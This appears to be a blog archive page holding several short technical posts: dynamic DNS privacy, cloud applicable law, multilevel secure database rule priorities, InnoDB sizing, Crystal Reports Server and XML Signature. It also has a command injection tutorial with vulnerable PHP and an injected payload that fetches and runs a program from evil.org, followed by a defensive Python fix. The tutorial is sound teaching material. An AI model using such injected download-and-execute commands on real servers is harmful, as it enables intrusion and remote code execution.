Archive for category Application Development

The Problem with Dynamic DNS

Consider a business traveler who has a laptop configured to automatically update a remote DNS server with its current IP address. If the FQDN that was being updated by the laptop is known, or can be guessed, then anyone with modest computer skills can issue DNS queries on that name at regular intervals and monitor the current IP address.

As the traveler moves from one location to another, the IP address will change and the public DNS record for the FQDN will reflect this. The person monitoring the domain name will be able to observe the precise network locations used whenever the laptop connects to the Internet, as well as an approximate timestamp for when each event took place. Depending on the resources available to the monitor, most notably whether or not they work for law enforcement, they may be able to map that network location to a geographic location, possibly with a high degree of resolution.

The public DNS system is distributed across thousands of servers on the Internet and is used in a wide range of Internet protocols. Dynamic DNS monitoring uses nothing more than basic DNS queries, and as such it offers effectively complete anonymity to the person doing the surveillance. Moreover, the target is unable to detect that they are being observed in this manner. This represents a new form of surveillance that might be used by law enforcement for legitimate purposes, or for unethical reasons by the target's co-workers, competitors, or even stalkers.

Dynamic DNS is used by a large number of users for various reasons. For many of these, with static residential or business computers, monitoring poses no real privacy risk. But for those who travel with their laptop it could pose a serious risk to their personal privacy and business confidentiality. This risk has not been widely recognized thus far.


How to determine applicable law in the cloud?

The identification of applicable laws in the absence of any explicit choice by the parties involved is difficult in relation to any information society service, and cloud computing service models are certainly no exception. In a European context, the provisions of the eCommerce Directive play a central role, as it contains specific rules on applicable law for information society services. However, it is clear that this will be insufficient to address all questions in this domain: the rules established by the Directive obviously apply only in Member States, and in a non-European international context will not be able to solve conflicts of law. In addition, applicability of the law remains linked to the geographical location of the information society service provider, and in a cloud model it may be difficult to identify this entity or its geographical location. Finally, certain issues including contractual consumer protection clauses and intellectual property protection are excluded from the Directive’s scope, meaning that answers to conflicts of law in these domains will have to be sought elsewhere. Thus, it is already very complicated to identify the starting point for the establishment of trust, namely the specific laws that will apply in the absence of a choice by the parties. Globally, voluntary choice of applicable law by the stakeholders in a cloud service model may be the only viable solution to identify applicable law. In practice, the importance of this issue should not be overstated, as the choice of an applicable legal system on a contractual basis has indeed become standard practice in information society service contracts.


Conflict Resolution and Rule Priorities in an MLS Active Database

We can specify any of the conflict resolution policies enumerated above for rules having the same security level. However, if there are rules belonging to different security levels, the conflict resolution policy must always favor the dominated rule. This is because delaying a rule at the dominated level because of the execution of a rule at the dominating level may give rise to a timing channel.

In a multilevel secure active database system we can also specify priorities, but the requirement is that no dominating rule must have a higher priority than a dominated rule. Thus, if priorities are specified by ordering the set of rules, then all rules at dominated levels must be ordered before any rule at the dominating level.

If numeric priorities are to be specified, one approach is to make the priority specification have two parts: one for the security level and the other for the number. For rules having different security levels, the dominated rules will get preference over the dominating rules. For rules having the same security level, the number will decide which rule is chosen for execution.
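The two-part priority scheme above, as an added example in Python (not code from the post). It assumes a totally ordered set of security levels; the rule names and levels in the demo are constructed, and the `violations` checker is my own addition for auditing an explicit rule ordering.

```python
from typing import List, Tuple

# Assumption: levels form a total order; a lower index is dominated by every
# higher index. A lattice would need a partial-order comparison instead.
LEVELS = ["unclassified", "confidential", "secret", "top_secret"]

Rule = Tuple[str, str, int]   # (rule name, security level, numeric priority)

def dominates(a: str, b: str) -> bool:
    """True if level a strictly dominates level b."""
    return LEVELS.index(a) > LEVELS.index(b)

def schedule(rules: List[Rule]) -> List[str]:
    """Order fired rules for execution.

    Dominated levels always run first, so a dominating rule can never delay
    a dominated one (the timing channel described above). Within one level
    the numeric part decides: a lower number runs earlier.
    """
    return [name for name, level, num in
            sorted(rules, key=lambda r: (LEVELS.index(r[1]), r[2]))]

def violations(ordered: List[Rule]) -> List[Tuple[str, str]]:
    """Audit an explicit priority ordering (earlier = higher priority):
    return every pair where a dominating rule precedes a dominated rule."""
    bad = []
    for i, (hi_name, hi_level, _) in enumerate(ordered):
        for lo_name, lo_level, _ in ordered[i + 1:]:
            if dominates(hi_level, lo_level):
                bad.append((hi_name, lo_name))
    return bad

if __name__ == "__main__":
    # Constructed rule set: two unclassified rules, one secret, one top secret.
    fired = [("audit", "secret", 1), ("notify", "unclassified", 5),
             ("archive", "unclassified", 2), ("purge", "top_secret", 0)]
    print(schedule(fired))      # ['archive', 'notify', 'audit', 'purge']
    print(violations(fired))    # [('audit', 'notify'), ('audit', 'archive')]
```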


Determining InnoDB Resource Requirements

It is all well and good to wave one’s hands and say “InnoDB clearly requires far more memory for these reasons,” but it gets slightly difficult to pin down exactly how much more memory. This is true for several reasons:

1. How did you load your database?

InnoDB table size is not a constant. If you took a straight SQL dump from a MyISAM table and inserted it into an InnoDB table, it is likely larger than it really needs to be. This is because the data was loaded out of primary key order, and the index isn't tightly packed as a result. If you took the dump with the --order-by-primary option to mysqldump, you likely have a much smaller table and will need less memory to buffer it.

2. What exactly is your table size?

This is an easy question to answer with MyISAM: that information is directly in the output of “SHOW TABLE STATUS”. However, the numbers from that same source for InnoDB are known to be estimates only. The sizes shown are the physical sizes reserved for the tables and have nothing to do with the actual data size at that point. Even the row count is a best guess.

3. How large is your primary key?

It was mentioned above that InnoDB clusters the data for a table around the primary key. This means that any secondary index leaves must contain the primary key of the data they "point to." Thus, if you have tables with a large primary key, you will need more memory to buffer a secondary index and more disk space to hold them. This is one of the reasons some people argue for short "artificial" primary keys for InnoDB tables when there isn't one "natural" primary key.

There is no set method that will work for everyone to predict the needed resources. Worse than that, your needed resources will change with time as more inserts to your table increase its size and fragment the packing of the B-tree. It is important not to run at 100% usage of the InnoDB buffer pool, as this likely means that you're not buffering as much as you could for reads, and that you're starving your write buffer, which lives in the same global InnoDB buffer pool.


Crystal Reports Server

Crystal Reports Server is built on the services-oriented architecture of BusinessObjects Enterprise. BusinessObjects Enterprise is a complete business intelligence (BI) platform that provides specialized end-user tools including Crystal Reports, Web Intelligence, OLAP Intelligence, Performance Manager, and Dashboard Manager. BusinessObjects Enterprise also includes data integration capabilities from Data Integrator. It is architected using modern web standards, with an industry-standard communication framework to tie all the components and services together.

Crystal Reports Server harnesses the reporting services and components of the BusinessObjects Enterprise architecture to offer small and medium businesses a proven reporting solution. It addresses the complete reporting process—from data access and report design, to report management and delivery, to report integration with portals and enterprise applications.

Functional Architecture of Crystal Reports Server

Crystal Reports Server is comprised of separate—yet interconnected—components and services optimized for specific tasks. These components and services include:


  • Data services for comprehensive and flexible data access
  • Creation tool for flexible data formatting using Crystal Reports
  • Platform services for report publishing, security, and processing
  • Management tools for managing Crystal Reports Server services and objects
  • Web and application services for customized report integration with portals and applications
  • User interaction tier for end-user report viewing and interaction


Command Injection

A successful command injection attack gives the attacker complete control of the remote system.

When user input is used as part of a system command, an attacker may be able to inject system commands through that user input. This can happen in any programming language; however, it is very common in Perl, PHP, and shell-based CGI. It is less common in Java, Python, and C#. Consider the following PHP code snippet:

<?php
$email_subject = "some subject";
if (isset($_GET['email'])) {
    // Vulnerable: the raw "email" parameter is concatenated into a shell command
    system("mail " . $_GET['email'] . " -s '" . $email_subject .
           "' < /tmp/email_body", $return_val);
}
?>

The user sends his or her e-mail address in the email parameter, and that user input is placed directly into a system command. Like SQL injection, the goal of the attacker is to inject a shell command into the email parameter while ensuring that the code before and after the email parameter is syntactically correct. Consider the system() call as a puzzle. The outer puzzle pieces are in place, and the attacker must find a puzzle piece in the middle to finish it off:

mail [MISSING PUZZLE PIECE] -s 'some subject' < /tmp/email_body

The puzzle piece needs to ensure that the mail command runs and exits properly. For example, mail --help will run and exit properly. Then the attacker could add additional shell commands by separating the commands with semicolons (;). Dealing with the puzzle piece on the other side is as simple as commenting it out with the shell comment symbol (#). Thus, a useful puzzle piece for the email parameter might be this:

--help; wget http://evil.org/attack_program; ./attack_program #

Adding this puzzle piece to the puzzle creates the following shell command:

mail --help; wget http://evil.org/attack_program;
./attack_program # -s 'some subject' < /tmp/email_body

This is equivalent to:

mail --help; wget http://evil.org/attack_program; ./attack_program

This runs mail --help, then downloads attack_program from evil.org and executes it, allowing the attacker to run arbitrary commands on the vulnerable web server.
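The same mail call rewritten from the defender's side, as an added Python example (not the post's PHP): the email parameter is validated first and then passed so that the shell can never read it as syntax. The function names, the allow-list pattern and the sample payload are constructed for this example.

```python
import re
import shlex
import subprocess

# Assumption: a conservative e-mail allow-list is acceptable for this form.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

def naive_command(email: str, subject: str) -> str:
    """Mirrors the vulnerable snippet: raw concatenation into one shell string."""
    return "mail " + email + " -s '" + subject + "' < /tmp/email_body"

def safe_command(email: str, subject: str) -> str:
    """If a shell string is unavoidable, quote every user-derived value so the
    shell sees it as a single word whatever characters it contains."""
    return "mail %s -s %s < /tmp/email_body" % (
        shlex.quote(email), shlex.quote(subject))

def safe_argv(email: str, subject: str) -> list:
    """Preferred fix: no shell at all. Each value is exactly one argv entry."""
    return ["mail", email, "-s", subject]

def is_valid_email(value: str) -> bool:
    """Allow-list check performed before anything reaches a command line."""
    return bool(EMAIL_RE.match(value))

def words(cmd: str) -> list:
    """Split a command the way a POSIX shell would (';' and '<' are separate
    tokens), so the two command strings above can be compared."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)

def send(email: str, subject: str) -> int:
    """Validate, then run without a shell; the body redirection moves into
    Python. Returns the exit status of mail."""
    if not is_valid_email(email):
        raise ValueError("invalid e-mail address")
    with open("/tmp/email_body", "rb") as body:
        return subprocess.run(safe_argv(email, subject), stdin=body,
                              check=False).returncode

if __name__ == "__main__":
    # Constructed payload: the shell would see a second command here.
    payload = "nobody@example.com; echo injected"
    print(words(naive_command(payload, "some subject")))  # ';' is its own token
    print(words(safe_command(payload, "some subject")))   # payload stays one word
```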


Using XML Signature

A digital signature is a cryptographic value that enables a recipient to verify the source and validity of an incoming message. XML Signature defines an XML syntax for digital signatures.

When you enable SOAP header processing for a particular virtual service, the ACE XML Gateway validates XML signatures in incoming messages received at the interface defined by the object. If a signature does not match the element that is signed, the message is rejected.

Signature validity alone does not ensure message authenticity: the signature could have been generated using any certificate, including one issued by an untrusted source. If using XML Signature as part of your implementation strategy, you should also specify which Certificate Authorities you want to be trusted, and direct the ACE XML Gateway to accept only signatures generated with certificates issued by those trusted CAs.

Enabling header processing causes signatures to be validated if present in an incoming message (and causes messages with invalid signatures to be blocked), but it doesn't require a message to have a signature.

The final step in configuring XML Signature, therefore, is specifying the elements of the incoming message that must be signed. In the policy configuration, you can require a signature covering one or more of:

  • the message timestamp (a common practice in Web service implementations).
  • the first element below the SOAP body.
  • a particular element you specify by XPath. Each XPath expression you specify must resolve to a signed XML element whose signature must be valid for the ACE XML Gateway to accept the message.
